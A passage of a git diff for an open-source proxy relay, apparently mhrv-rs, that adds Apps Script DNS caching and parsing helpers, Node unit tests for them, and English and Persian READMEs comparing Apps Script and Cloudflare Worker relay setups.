TUNNEL_AUTH_KEY, ops: ops }), + muteHttpExceptions: true, + followRedirects: true, + }); + if (resp.getResponseCode() !== 200) { + return { error: "tunnel batch HTTP " + resp.getResponseCode() }; + } + try { + var parsed = JSON.parse(resp.getContentText()); + return { r: (parsed && parsed.r) || [] }; + } catch (err) { + return { error: "tunnel batch parse error" }; + } +} + +// Pure helper: writes forwardedResults[j] into allResults[forwardIdx[j]] +// for each j. Returns the mutated allResults so callers can chain. Pure +// function — testable without the GAS runtime. +function _spliceTunnelResults(forwardIdx, forwardedResults, allResults) { + for (var j = 0; j < forwardIdx.length; j++) { + allResults[forwardIdx[j]] = forwardedResults[j]; + } + return allResults; +} + // ========================== HTTP relay mode ========================== function _doSingle(req) { @@ -217,3 +360,205 @@ function _json(obj) { ContentService.MimeType.JSON ); } + +// ========================== Edge DNS helpers ========================== + +// Tries to serve a single udp_open DNS op from CacheService or DoH. +// Returns a synthesized batch-result {sid, pkts, eof} on success, or null +// on any failure / unsupported case so the caller can forward to the +// tunnel-node. Null is the safe default — every error path returns null. +function _edgeDnsTry(op) { + try { + var bytes = Utilities.base64Decode(op.d); + if (!bytes || bytes.length < 12) return null; + + var q = _dnsParseQuestion(bytes); + if (!q) return null; + if (EDGE_DNS_REFUSE_QTYPES[q.qtype]) return null; + + var key = EDGE_DNS_CACHE_PREFIX + q.qtype + ":" + q.qname; + if (key.length > EDGE_DNS_MAX_KEY_LEN) return null; + var cache = CacheService.getScriptCache(); + + var stored = null; + try { stored = cache.get(key); } catch (_) {} + if (stored) { + try { + var hit = Utilities.base64Decode(stored); + if (hit && hit.length >= 12) { + // Rewrite txid to match this query (RFC 1035 §4.1.1). + var rewritten = _dnsRewriteTxid(hit, q.txid); + return { + sid: "edns-cache", + pkts: [Utilities.base64Encode(rewritten)], + eof: true, + }; + } + } catch (_) { /* corrupt cache entry — fall through to DoH */ } + } + + for (var i = 0; i < EDGE_DNS_RESOLVERS.length; i++) { + var reply = _edgeDnsDoh(EDGE_DNS_RESOLVERS[i], bytes); + if (!reply) continue; + + var rcode = reply[3] & 0x0F; + var ttl; + if (rcode === 2 || rcode === 3) { + ttl = EDGE_DNS_NEG_TTL_S; + } else { + var minTtl = _dnsMinTtl(reply); + ttl = (minTtl === null) ? EDGE_DNS_NEG_TTL_S : minTtl; + if (ttl < EDGE_DNS_MIN_TTL_S) ttl = EDGE_DNS_MIN_TTL_S; + if (ttl > EDGE_DNS_MAX_TTL_S) ttl = EDGE_DNS_MAX_TTL_S; + } + + try { + cache.put(key, Utilities.base64Encode(reply), ttl); + } catch (_) { + // >100KB value or transient quota — still return the live answer. + } + + // The DoH reply already echoes our query's txid; rewrite defensively + // in case a resolver mangles it. + var fixed = _dnsRewriteTxid(reply, q.txid); + return { + sid: "edns-doh", + pkts: [Utilities.base64Encode(fixed)], + eof: true, + }; + } + return null; + } catch (err) { + return null; + } +} + +// Single DoH GET against `url`. Returns the reply as a byte array, or null +// on any failure (HTTP non-200, network error, malformed body). +function _edgeDnsDoh(url, queryBytes) { + try { + var dns = Utilities.base64EncodeWebSafe(queryBytes).replace(/=+$/, ""); + var resp = UrlFetchApp.fetch(url + "?dns=" + dns, { + method: "get", + muteHttpExceptions: true, + followRedirects: true, + headers: { accept: "application/dns-message" }, + }); + if (resp.getResponseCode() !== 200) return null; + var body = resp.getContent(); + if (!body || body.length < 12) return null; + return body; + } catch (err) { + return null; + } +} + +// Returns { txid, qname, qtype } from a DNS wire-format query. +// qname is lowercased and dot-joined (no trailing dot). Null on malformed. +function _dnsParseQuestion(bytes) { + if (bytes.length < 12) return null; + var qdcount = ((bytes[4] & 0xFF) << 8) | (bytes[5] & 0xFF); + // RFC ambiguity: multi-question queries are essentially unused in + // practice and would mis-key the cache (we'd cache a multi-answer reply + // under only the first question). Bail and let the tunnel-node handle it. + if (qdcount !== 1) return null; + + var off = 12; + var labels = []; + var nameLen = 0; + while (off < bytes.length) { + var len = bytes[off] & 0xFF; + if (len === 0) { off++; break; } + if ((len & 0xC0) !== 0) return null; // questions don't use compression + if (len > 63) return null; + off++; + if (off + len > bytes.length) return null; + var label = ""; + for (var i = 0; i < len; i++) { + var c = bytes[off + i] & 0xFF; + if (c >= 0x41 && c <= 0x5A) c += 0x20; // ASCII lowercase + label += String.fromCharCode(c); + } + labels.push(label); + off += len; + nameLen += len + 1; + if (nameLen > 255) return null; + } + if (off + 4 > bytes.length) return null; + var qtype = ((bytes[off] & 0xFF) << 8) | (bytes[off + 1] & 0xFF); + + return { + txid: ((bytes[0] & 0xFF) << 8) | (bytes[1] & 0xFF), + qname: labels.join("."), + qtype: qtype, + }; +} + +// Walks the DNS reply's answer + authority sections and returns the min RR +// TTL, or null if there are no RRs (caller treats null as "use neg TTL"). +// Returns null on any malformed input. +function _dnsMinTtl(bytes) { + if (bytes.length < 12) return null; + var qdcount = ((bytes[4] & 0xFF) << 8) | (bytes[5] & 0xFF); + var ancount = ((bytes[6] & 0xFF) << 8) | (bytes[7] & 0xFF); + var nscount = ((bytes[8] & 0xFF) << 8) | (bytes[9] & 0xFF); + + var off = 12; + for (var q = 0; q < qdcount; q++) { + off = _dnsSkipName(bytes, off); + if (off < 0 || off + 4 > bytes.length) return null; + off += 4; + } + + var min = null; + var rrTotal = ancount + nscount; + for (var r = 0; r < rrTotal; r++) { + off = _dnsSkipName(bytes, off); + if (off < 0 || off + 10 > bytes.length) return null; + // 2B type, 2B class, 4B TTL, 2B rdlength + var ttl = ((bytes[off + 4] & 0xFF) * 0x1000000) + + (((bytes[off + 5] & 0xFF) << 16) + | ((bytes[off + 6] & 0xFF) << 8) + | (bytes[off + 7] & 0xFF)); + // RFC 2181: TTLs are 32-bit unsigned; values with the top bit set are + // treated as 0. Multiplying the high byte (instead of <<24) avoids V8 + // sign-extension and keeps `ttl` in [0, 2^32). + if (ttl < 0 || ttl > 0x7FFFFFFF) ttl = 0; + if (min === null || ttl < min) min = ttl; + var rdlen = ((bytes[off + 8] & 0xFF) << 8) | (bytes[off + 9] & 0xFF); + off += 10 + rdlen; + if (off > bytes.length) return null; + } + return min; +} + +// Advances past a DNS name (sequence of labels or 16-bit pointer). +// Returns the new offset, or -1 on malformed input. +function _dnsSkipName(bytes, off) { + while (off < bytes.length) { + var len = bytes[off] & 0xFF; + if (len === 0) return off + 1; + if ((len & 0xC0) === 0xC0) { + if (off + 2 > bytes.length) return -1; + return off + 2; // pointer terminates the name in-place + } + if ((len & 0xC0) !== 0) return -1; // reserved label type + if (len > 63) return -1; + off += 1 + len; + } + return -1; +} + +// Returns a copy of `bytes` with the first 2 bytes overwritten by the +// big-endian 16-bit transaction id. Coerces to signed-byte range so the +// result round-trips through Utilities.base64Encode regardless of whether +// the runtime exposes bytes as signed Java int8 or unsigned JS numbers. +function _dnsRewriteTxid(bytes, txid) { + var out = []; + for (var i = 0; i < bytes.length; i++) out.push(bytes[i]); + var hi = (txid >> 8) & 0xFF; + var lo = txid & 0xFF; + out[0] = hi > 127 ? hi - 256 : hi; + out[1] = lo > 127 ? lo - 256 : lo; + return out; +} diff --git a/assets/apps_script/README.md b/assets/apps_script/README.md index 1cf339a2..6af81d64 100644 --- a/assets/apps_script/README.md +++ b/assets/apps_script/README.md @@ -1,13 +1,18 @@ -# Apps Script source (mirrored) +# Apps Script source -The file `Code.gs` next to this README is a verbatim snapshot of the upstream script you deploy in your own Google Apps Script project: +Three deploy-ready Apps Script files live here. They all speak the same `{k, m, u, h, b, ct, r}` wire protocol with `mhrv-rs`, so the client just points its `script_id` at whichever deployment you want — no mode change required. -- Upstream: -- Raw link: +## Variants and origins -This copy lives in our repo for two reasons: +- **`Code.gs`** — standard relay. **Verbatim mirror of upstream.** Apps Script does the outbound fetch itself. This is the default choice for most users. + - Upstream: + - Credit: [@masterking32](https://github.com/masterking32). We do not modify this file. + - The mirror lives here so that (a) users on networks where `raw.githubusercontent.com` is unreachable can still deploy from a `git clone` / ZIP, and (b) we have a snapshot to diff against if upstream changes silently break the informal relay protocol. -1. **Survives upstream outages**: if the user is on a network where raw.githubusercontent.com is temporarily unreachable but they can clone or ZIP this repo, they still have the deploy-ready file. -2. **Pins what we tested against**: the relay protocol between `mhrv-rs` and the script is informal; upstream changes can silently break us. Keeping a snapshot here lets us diff and see if a spec drift is responsible for any reported breakage. +- **`CodeFull.gs`** — superset of `Code.gs` that additionally proxies raw-TCP / UDP via `tunnel-node` (used by `mode: "full"`). **Maintained in this repo** — written for this Rust port and not present upstream. Deploy this if you want full-tunnel mode; details in the file's header comment. -All credit for `Code.gs` goes to [@masterking32](https://github.com/masterking32) — we do not modify it. If you're using mhrv-rs, follow the upstream deploy instructions in the script's header comment. The only edit **you** must make is the `AUTH_KEY` constant — set it to a strong secret and reuse that exact string in your `mhrv-rs` config. +- **`Code.cfw.gs`** — Apps Script becomes a thin auth+forward layer; the actual outbound fetch happens on a Cloudflare Worker you also deploy ([`assets/cloudflare/`](../cloudflare/)). **Derivative work — not unmodified upstream.** The pattern of forwarding through a Cloudflare Worker came from [denuitt1/mhr-cfw](https://github.com/denuitt1/mhr-cfw); this file inherits hardening from `Code.gs` (decoy-on-bad-auth, fail-closed sentinels) and adds chunked batch forwarding (`Promise.all` on the Worker side, `ceil(N/40)` GAS calls per batch) that the upstream `mhr-cfw` does not have. Faster per-call latency, worse YouTube long-form, no fix for Cloudflare anti-bot. Read [`assets/cloudflare/README.md`](../cloudflare/README.md) before choosing this one. + +## What you must edit before deploying + +For every variant: change `AUTH_KEY` from its placeholder to a strong secret, and use that same string in your `mhrv-rs` config's `auth_key`. `Code.cfw.gs` additionally requires setting `WORKER_URL` to your deployed Cloudflare Worker URL; `CodeFull.gs` additionally requires `TUNNEL_SERVER_URL` and `TUNNEL_AUTH_KEY` for the tunnel-node leg. diff --git a/assets/apps_script/tests/edge_dns_test.js b/assets/apps_script/tests/edge_dns_test.js new file mode 100644 index 00000000..f59c7576 --- /dev/null +++ b/assets/apps_script/tests/edge_dns_test.js @@ -0,0 +1,212 @@ +// Pure-JS sanity tests for the edge DNS cache helpers in CodeFull.gs. +// +// Run from repo root: node assets/apps_script/tests/edge_dns_test.js +// +// The tests extract the helpers that don't depend on the GAS runtime +// (Utilities, CacheService, UrlFetchApp) and exercise them against +// crafted DNS wire-format payloads. They catch the bugs most likely to +// regress when editing the parser: txid handling, name-pointer +// compression, TTL sign-extension, splice ordering with mixed batches. + +'use strict'; + +const fs = require('fs'); +const path = require('path'); + +const SRC = path.join(__dirname, '..', 'CodeFull.gs'); +const src = fs.readFileSync(SRC, 'utf8'); + +// Extract pure-JS helpers and eval them in a shared scope so cross-refs +// (_dnsMinTtl → _dnsSkipName) resolve. +const NAMES = [ + '_dnsSkipName', + '_dnsParseQuestion', + '_dnsMinTtl', + '_dnsRewriteTxid', + '_spliceTunnelResults', +]; +let bundle = ''; +for (const name of NAMES) { + const re = new RegExp(`function ${name}\\b[\\s\\S]*?\\n\\}\\n`, 'g'); + const m = src.match(re); + if (!m) throw new Error('helper not found in CodeFull.gs: ' + name); + bundle += m[0] + '\n'; +} +bundle += `return { ${NAMES.join(', ')} };`; +// eslint-disable-next-line no-new-func +const ctx = new Function(bundle)(); + +let passed = 0; +function ok(label) { console.log(' ok'); passed++; } +function check(label, cond, detail) { + if (!cond) { + console.error('FAIL: ' + label + (detail ? ' — ' + detail : '')); + process.exit(1); + } +} + +// --- 1. parse a query for example.com A --- +const q1 = Buffer.from([ + 0x12, 0x34, // txid + 0x01, 0x00, // flags: RD=1 + 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, // counts + 0x07, 0x65, 0x78, 0x61, 0x6d, 0x70, 0x6c, 0x65, // "example" + 0x03, 0x63, 0x6f, 0x6d, 0x00, // "com" 0 + 0x00, 0x01, 0x00, 0x01, // qtype=A, qclass=IN +]); +console.log('TEST 1 query parse'); +const r1 = ctx._dnsParseQuestion(q1); +check('txid', r1.txid === 0x1234, r1 && r1.txid.toString(16)); +check('qname', r1.qname === 'example.com', r1 && r1.qname); +check('qtype', r1.qtype === 1); +ok(); + +// --- 2. case-fold (DNS names are case-insensitive on the wire) --- +const q2 = Buffer.from([ + 0xab, 0xcd, 0x01, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, + 0x07, 0x45, 0x58, 0x41, 0x4d, 0x50, 0x4c, 0x45, // "EXAMPLE" + 0x03, 0x43, 0x4f, 0x4d, 0x00, // "COM" 0 + 0x00, 0x1c, 0x00, 0x01, // qtype=AAAA(28) +]); +console.log('TEST 2 case-fold to lowercase'); +const r2 = ctx._dnsParseQuestion(q2); +check('lowercased qname', r2.qname === 'example.com', r2 && r2.qname); +check('qtype AAAA', r2.qtype === 28); +ok(); + +// --- 3. txid rewrite preserves all other bytes --- +console.log('TEST 3 txid rewrite is byte-identical except [0..1]'); +const rewritten = ctx._dnsRewriteTxid(q1, 0xdead); +check('hi byte', (rewritten[0] & 0xFF) === 0xde); +check('lo byte', (rewritten[1] & 0xFF) === 0xad); +check('length', rewritten.length === q1.length); +for (let i = 2; i < q1.length; i++) { + check('byte ' + i + ' unchanged', (rewritten[i] & 0xFF) === q1[i]); +} +check('source not mutated (cache safety)', + q1[0] === 0x12 && q1[1] === 0x34, 'source bytes 0..1 = ' + q1[0] + ',' + q1[1]); +ok(); + +// --- 4. min-TTL extraction with answer name-pointer compression --- +const reply4 = Buffer.from([ + 0x12, 0x34, 0x81, 0x80, + 0x00, 0x01, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, + 0x07, 0x65, 0x78, 0x61, 0x6d, 0x70, 0x6c, 0x65, + 0x03, 0x63, 0x6f, 0x6d, 0x00, + 0x00, 0x01, 0x00, 0x01, + 0xc0, 0x0c, // pointer to QNAME + 0x00, 0x01, 0x00, 0x01, + 0x00, 0x00, 0x01, 0x2c, // TTL=300 + 0x00, 0x04, + 0x5d, 0xb8, 0xd8, 0x22, // 93.184.216.34 +]); +console.log('TEST 4 reply min-TTL (answer with pointer)'); +check('TTL=300', ctx._dnsMinTtl(reply4) === 300); +ok(); + +// --- 5. NXDOMAIN with SOA in authority — TTL comes from authority RR --- +const soa = Buffer.from([ + 0x02, 0x6e, 0x73, 0x04, 0x74, 0x65, 0x73, 0x74, 0x00, // mname "ns.test." + 0x0a, 0x68, 0x6f, 0x73, 0x74, 0x6d, 0x61, 0x73, 0x74, 0x65, 0x72, + 0x04, 0x74, 0x65, 0x73, 0x74, 0x00, // rname + 0x00, 0x00, 0x00, 0x01, + 0x00, 0x00, 0x00, 0x02, + 0x00, 0x00, 0x00, 0x03, + 0x00, 0x00, 0x00, 0x04, + 0x00, 0x00, 0x00, 0x05, +]); +const nxHeader = Buffer.from([ + 0x12, 0x34, 0x81, 0x83, // RCODE=3 + 0x00, 0x01, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, + 0x07, 0x6d, 0x69, 0x73, 0x73, 0x69, 0x6e, 0x67, // "missing" + 0x04, 0x74, 0x65, 0x73, 0x74, 0x00, // "test" + 0x00, 0x01, 0x00, 0x01, +]); +const authRR = Buffer.concat([ + Buffer.from([0xc0, 0x14]), // pointer to "test" + Buffer.from([0x00, 0x06, 0x00, 0x01]), // SOA / IN + Buffer.from([0x00, 0x00, 0x00, 0x3c]), // TTL=60 + Buffer.from([0x00, soa.length]), + soa, +]); +const nxReply = Buffer.concat([nxHeader, authRR]); +console.log('TEST 5 NXDOMAIN: rcode + SOA TTL parse'); +check('rcode 3', (nxReply[3] & 0x0F) === 3); +check('soa TTL 60', ctx._dnsMinTtl(nxReply) === 60); +ok(); + +// --- 6. malformed (truncated header) → null --- +console.log('TEST 6 truncated input rejected'); +check('null', ctx._dnsParseQuestion(Buffer.from([0x00, 0x00, 0x01])) === null); +ok(); + +// --- 7. illegal pointer in question section → null --- +const q7 = Buffer.from([ + 0x00, 0x01, 0x01, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, + 0xc0, 0x0c, // illegal in question + 0x00, 0x01, 0x00, 0x01, +]); +console.log('TEST 7 reject compression in question'); +check('null', ctx._dnsParseQuestion(q7) === null); +ok(); + +// --- 8. TTL with high bit set is clamped to 0 (RFC 2181 §8) --- +// Build a minimal A reply where the answer's 4-byte TTL field is 0x80000000. +const reply8 = Buffer.from([ + 0x12, 0x34, 0x81, 0x80, + 0x00, 0x01, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, + 0x07, 0x65, 0x78, 0x61, 0x6d, 0x70, 0x6c, 0x65, + 0x03, 0x63, 0x6f, 0x6d, 0x00, + 0x00, 0x01, 0x00, 0x01, + 0xc0, 0x0c, + 0x00, 0x01, 0x00, 0x01, + 0x80, 0x00, 0x00, 0x00, // TTL with top bit set + 0x00, 0x04, + 0x01, 0x02, 0x03, 0x04, +]); +console.log('TEST 8 TTL with high bit → clamped to 0'); +const t8 = ctx._dnsMinTtl(reply8); +check('TTL clamped to 0 (not negative, not 2^31+)', t8 === 0, 'got ' + t8); +ok(); + +// --- 9. splice: forwarded results land at original op indices --- +console.log('TEST 9 splice into mixed-batch slots'); +// Simulate a 5-op batch where indices 1 and 3 were served locally as DNS +// hits, indices 0/2/4 were forwarded as TCP ops. +const allResults = new Array(5); +allResults[1] = { sid: 'edns-cache-1', pkts: ['A'], eof: true }; +allResults[3] = { sid: 'edns-doh-3', pkts: ['B'], eof: true }; +const forwardIdx = [0, 2, 4]; +const forwardedResults = [ + { sid: 'tcp-0', d: 'X' }, + { sid: 'tcp-2', d: 'Y' }, + { sid: 'tcp-4', d: 'Z' }, +]; +const merged = ctx._spliceTunnelResults(forwardIdx, forwardedResults, allResults); +check('slot 0 from tunnel', merged[0].sid === 'tcp-0'); +check('slot 1 from cache', merged[1].sid === 'edns-cache-1'); +check('slot 2 from tunnel', merged[2].sid === 'tcp-2'); +check('slot 3 from doh', merged[3].sid === 'edns-doh-3'); +check('slot 4 from tunnel', merged[4].sid === 'tcp-4'); +check('returns same array', merged === allResults); +ok(); + +// --- 10. splice when nothing is forwarded --- +console.log('TEST 10 splice with empty forward list'); +const allDns = [{ sid: 'a' }, { sid: 'b' }]; +const result10 = ctx._spliceTunnelResults([], [], allDns); +check('no mutation', result10[0].sid === 'a' && result10[1].sid === 'b'); +ok(); + +// --- 11. splice when everything is forwarded --- +console.log('TEST 11 splice with everything forwarded'); +const empty = new Array(3); +const result11 = ctx._spliceTunnelResults( + [0, 1, 2], + [{ sid: 'x' }, { sid: 'y' }, { sid: 'z' }], + empty, +); +check('all filled', result11[0].sid === 'x' && result11[2].sid === 'z'); +ok(); + +console.log('\n' + passed + ' tests passed'); diff --git a/assets/cloudflare/README.fa.md b/assets/cloudflare/README.fa.md new file mode 100644 index 00000000..4b183940 --- /dev/null +++ b/assets/cloudflare/README.fa.md @@ -0,0 +1,110 @@ +
+ +# خروجی Cloudflare Worker (پشتیبان جایگزین برای Apps Script) + +> *English: [README.md](README.md)* + +این پوشه یک **Cloudflare Worker** ارائه می‌کند که همراه با [`assets/apps_script/Code.cfw.gs`](../apps_script/Code.cfw.gs) شکل متفاوتی از حالت `apps_script` به شما می‌دهد: + +``` +mhrv-rs ──► Apps Script (Code.cfw.gs) ──► Cloudflare Worker ──► مقصد + ▲ فقط احراز هویت و فوروارد ▲ گرفتن داده + base64 +``` + +پشتیبان استاندارد ([`assets/apps_script/Code.gs`](../apps_script/Code.gs)) خودِ `Apps Script` کار `fetch` به مقصد را انجام می‌دهد. این نسخه‌ٔ جایگزین، `Apps Script` را به یک رلهٔ نازک تبدیل می‌کند و کارِ اصلی را به لبهٔ `Cloudflare` می‌سپارد. **خود `mhrv-rs` تغییر نمی‌کند** — همان پاکت `JSON` روی سیم، همان `mode: "apps_script"` در `config.json`، همان `script_id`. تنها تفاوت این است که `Apps Script` مستقر شدهٔ شما بعد از احراز هویت چه می‌کند. + +ایدهٔ اصلی: . این کپی یک بررسی `AUTH_KEY` روی خود `Worker` اضافه می‌کند، رفتار «صفحهٔ تقلبی برای کلید نامعتبر» را از `Code.gs` به ارث می‌برد، و یک محافظ در برابر حلقه‌شدن دارد. + +## چه‌وقت ارزش راه‌اندازی دارد؟ + +✅ مرور وب، باز کردن صفحات جدید، ترافیک گفتگومحور — به‌طور محسوسی سریع‌تر می‌شود. تأخیر هر تماس از کف ۲۵۰ تا ۵۰۰ میلی‌ثانیه‌ٔ `Apps Script` به ۱۰ تا ۵۰ میلی‌ثانیه‌ٔ لبهٔ `Cloudflare` کاهش می‌یابد. + +✅ تلگرام بلادرنگ — پیام‌های کوتاه و مکرر بیشترین سود را می‌برند. + +✅ شبکه‌هایی که در آن‌ها ابتدا سهمیهٔ **زمان اجرای `Apps Script`** (۹۰ دقیقه در روز برای حساب‌های مصرفی گوگل) تمام می‌شود، نه شمارش `URL fetch`. در این حالت `GAS` تقریباً هیچ زمانی صرف هر تماس نمی‌کند. + +❌ **امروز هیچ کاهشی در شمارش روزانهٔ `UrlFetchApp` به دست نمی‌آورید.** مسیر رلهٔ `HTTP` در `mhrv-rs` همیشه فقط یک پاکت تک‌آدرسی می‌فرستد و هیچ‌گاه شکل دسته‌ای `q: [...]` را تولید نمی‌کند، پس هر درخواست کاربر همچنان یک `UrlFetchApp` در `GAS` مصرف می‌کند — مستقل از اینکه کدام نسخهٔ `Code.gs` را مستقر کرده باشید. مسیر `Code.cfw.gs` به سمت `Worker` *قابلیت* پشتیبانی از دسته را دارد (قطعه‌بندی ۴۰‌تایی، پخش‌سازی روی `Worker` با `Promise.all`، هزینهٔ `ceil(N / 40)` به جای `N`)، ولی این شاخه از هیچ کلاینت موجودی فراخوانی نمی‌شود. **تا زمانی که `mhrv-rs` خودش `HTTP relay` را دسته‌بندی نکند، سقف روزانهٔ ~۲۰٬۰۰۰ مصرف نسبت به `Code.gs` تغییر نمی‌کند.** این پشتیبانی برای سازگاری آینده در کد نگه داشته شده — هزینه‌ای ندارد و روزی که کلاینتِ دسته‌بندی‌کننده برسد، خود به خود فعال می‌شود. + +❌ ویدیوهای طولانی یوتیوب — **بدتر** می‌شود، نه بهتر. `Apps Script` تا حدود ۶ دقیقه دیوار اجرا (`wall`) به ازای هر فراخوانی می‌دهد؛ `Cloudflare Workers` در ۳۰ ثانیه قطع می‌کنند. صخرهٔ `SABR` زودتر فرا می‌رسد. برای استفادهٔ یوتیوب‌محور، روی `Code.gs` بمانید. + +❌ سایت‌هایی که پشت ضدبات `Cloudflare` هستند (توییتر/`X`، `OpenAI`، …) — `IP` خروجی حالا داخل خود `Cloudflare` است، که ضدبات `Cloudflare` آن را به‌عنوان «درخواست داخلی `Worker`» انگشت‌نگاری می‌کند. اغلب **سختگیرانه‌تر** از `IP` گوگل برخورد می‌شود. این مشکلی جدا از عبور از `DPI` است و هیچ‌کدام از این دو نسخه آن را حل نمی‌کنند. + +❌ اگر/زمانی که `HTTP relay` دسته‌ای فعال شود، سقف ۳۰ ثانیه‌ٔ `Cloudflare` روی **کندترین آدرس در هر قطعه** اعمال خواهد شد، نه به‌ازای هر `URL` — یک مقصد قفل‌شده می‌تواند کل قطعهٔ ۴۰ آدرسی را به `timeout` بکشاند. تلاش مجدد تک‌به‌تک در `mhrv-rs` این را پوشش می‌دهد، اما تفاوت رفتاری نسبت به دیوار `per-URL` در `fetchAll` استانداردِ `Code.gs` است. (امروز بی‌اثر است چون کلاینت دسته نمی‌فرستد.) + +## راه‌اندازی + +سه رشتهٔ هم‌خوان نیاز دارید: یک `AUTH_KEY` که بین `worker.js`، `Code.cfw.gs` و `config.json` خود `mhrv-rs` مشترک است. یک رمز تصادفی قوی انتخاب کنید و در هر سه جا paste کنید. + +### ۱. استقرار `Worker` + +۱. وارد شوید → **`Workers & Pages`** → **`Create`** → **`Hello World`** → **`Deploy`**. +۲. روی **`Edit code`** بزنید، کد پیش‌فرض را پاک کنید و محتوای [`worker.js`](worker.js) را paste کنید. +۳. ثابت `AUTH_KEY` در بالای فایل را به رمز قوی خودتان تغییر دهید. +۴. روی **`Deploy`** بزنید. آدرس `*.workers.dev` را کپی کنید — در مرحلهٔ بعد لازم است. + +### ۲. استقرار `Apps Script` + +۱. وارد با حساب گوگلتان شوید → **`New project`** → کد پیش‌فرض را پاک کنید. + +۲. محتوای [`../apps_script/Code.cfw.gs`](../apps_script/Code.cfw.gs) را paste کنید. + +۳. هر دو ثابت بالای فایل را تنظیم کنید: + - مقدار `AUTH_KEY` را همان رمزی بگذارید که در `worker.js` گذاشتید. + - مقدار `WORKER_URL` را آدرس کامل `https://…workers.dev` همان `Worker` که الان مستقر کردید بگذارید (حتماً با پیشوند `https://`). + +۴. از مسیر **`Deploy → New deployment → Web app`** استقرار را شروع کنید: مقدار `Execute as` را روی **`Me`** و `Who has access` را روی **`Anyone`** بگذارید. + +۵. سپس **`Deployment ID`** را کپی کنید. + +### ۳. اشاره دادن `mhrv-rs` به این `Apps Script` + +در `config.json` (یا از طریق فرم `UI`): + +```json +{ + "mode": "apps_script", + "script_id": "PASTE_DEPLOYMENT_ID_HERE", + "auth_key": "SAME_SECRET_AS_BOTH_FILES_ABOVE" +} +``` + +تمام. `mhrv-rs` لازم نیست بداند `Cloudflare` در کار است؛ از نگاه او این `script_id` مثل هر `Deployment` دیگری رفتار می‌کند. اگر چند `Deployment` دارید (بعضی استاندارد، بعضی `CFW`)، می‌توانید همه را در `script_ids: [...]` بگذارید — `round-robin` و `parallel-relay` همچنان روی همه‌شان کار می‌کند. + +## چرا هر سه `AUTH_KEY` باید یکی باشند؟ + +- **بین `mhrv-rs` و `Apps Script`**: جلوی این را می‌گیرد که هر `POST` تصادفی روی آدرس `*.googleusercontent.com` شما رله شود. درخواست‌هایی که این کلید را نداشته باشند، یک صفحهٔ `HTML` تقلبی می‌گیرند (به‌خاطر `DIAGNOSTIC_MODE = false` در `Code.cfw.gs`) و `Deployment` شما به‌جای یک تونل، شبیه یک پروژهٔ فراموش‌شده دیده می‌شود. +- **بین `Apps Script` و `Worker`**: اگر آدرس `Worker` لو برود، جلوی این را می‌گیرد که به یک رلهٔ `HTTP` باز برای مهاجم تبدیل شود. بدون این بررسی، `Worker` شما برای هر کسی که `URL` را پیدا کند، قابل سوءاستفاده است. نسخهٔ بالادست `mhr-cfw` این بررسی را ندارد؛ این کپی آن را اضافه می‌کند. + +اگر می‌خواهید برای امنیت بیشتر روی هر بخش رمز جدا داشته باشید، `Code.cfw.gs` را ویرایش کنید تا یک `k` متفاوت از آن چیزی که از `mhrv-rs` می‌گیرد به `Worker` بفرستد. تنظیم تک‌رمز ساده‌ترین حالتِ درست است. + +## بررسی اینکه کار می‌کند + +همان روش پشتیبان استاندارد: را از طریق پروکسی باز کنید. باید یک `IP` متعلق به `Cloudflare` ببینید (چون `fetch` واقعی حالا از شبکهٔ `Cloudflare` خارج می‌شود)، نه یک `IP` متعلق به گوگل که با `Code.gs` می‌دیدید. اگر `IP` واقعی خودتان را ببینید، پروکسی استفاده نمی‌شود؛ اگر `IP` گوگل ببینید، اشتباهاً `Code.gs` را به‌جای `Code.cfw.gs` مستقر کرده‌اید. + +دکمهٔ **`Test`** در `UI` دسکتاپ همچنان کار می‌کند — یک درخواست `HEAD` از طریق هر `Apps Script Deployment` که تنظیم کرده‌اید رله می‌کند. + +## جدول مقایسه در یک نگاه + +| محور | `Code.gs` (استاندارد) | `Code.cfw.gs` (این نسخه) | +|---|---|---| +| کف تأخیر هر تماس | ۲۵۰–۵۰۰ میلی‌ثانیه (هاپ داخلی `GAS`) | ۱۰–۵۰ میلی‌ثانیه (لبهٔ `CF`) | +| سهمیهٔ `UrlFetchApp` در روز، **آنچه `mhrv-rs` امروز می‌فرستد** | ۱ سهمیه به‌ازای هر درخواست | ۱ سهمیه به‌ازای هر درخواست — یکسان (`mhrv-rs` فقط پاکت تک‌آدرسی تولید می‌کند) | +| سهمیهٔ `UrlFetchApp` در روز، **اگر کلاینتی در آینده دسته بفرستد** | تعداد `N` سهمیه (یکی برای هر آدرس از طریق `fetchAll`) | تعداد `ceil(N / 40)` سهمیه (قطعه‌بندی ۴۰‌تایی؛ پخش‌سازی روی `Worker` با `Promise.all`) | +| سقف درخواست `Cloudflare Workers` در روز (پلن رایگان) | ندارد | ۱۰۰٬۰۰۰ — بسیار بالاتر از چیزی که `GAS` می‌تواند تغذیه‌اش کند؛ گلوگاه نیست | +| سهمیهٔ زمان اجرای `Apps Script` در روز | ۹۰ دقیقه، اغلب گلوگاه | ۹۰ دقیقه، به‌ندرت گلوگاه | +| دیوار اجرای هر فراخوانی | ~۶ دقیقه، به‌ازای هر آدرس | ۳۰ ثانیه، به‌ازای هر تماس (اگر دسته‌بندی فعال شود، به‌ازای هر قطعه) | +| سقف اندازهٔ پاسخ | ~۵۰ مگابایت (مستندات `Apps Script`) | محدود به حافظهٔ `Worker` (۱۲۸ مگابایت در پلن رایگان)؛ در عمل با تبدیل `base64` چند ده مگابایت | +| حروف بزرگ/کوچک هدرهای پاسخ | همان‌طور که مبدأ فرستاده | کاملاً کوچک می‌شود (`Headers.forEach` در `Workers` نرمال می‌کند). فقط برای ابزارهای پایین‌دستی که نام هدر را حساس به حروف مقایسه می‌کنند مهم است؛ `mhrv-rs` خود حساس به حروف نیست. | +| پخش ویدیوی طولانی یوتیوب | قابل قبول (صخرهٔ ۶ دقیقه) | بدتر (صخرهٔ ۳۰ ثانیه) | +| سرعت تلگرام / گفتگو | پایه | محسوساً بهتر | +| ضدبات `Cloudflare` روی مقصد | یک `IP` دیتاسنتر | یک `IP` داخلی `Worker` (اغلب سخت‌گیرانه‌تر) | +| کش پاسخ روی `Spreadsheet` | موجود (اختیاری) | در این نسخه نیست | +| پیچیدگی استقرار | ۱ چیز برای نگه‌داری | ۲ چیز که باید همگام بمانند | + +اگر 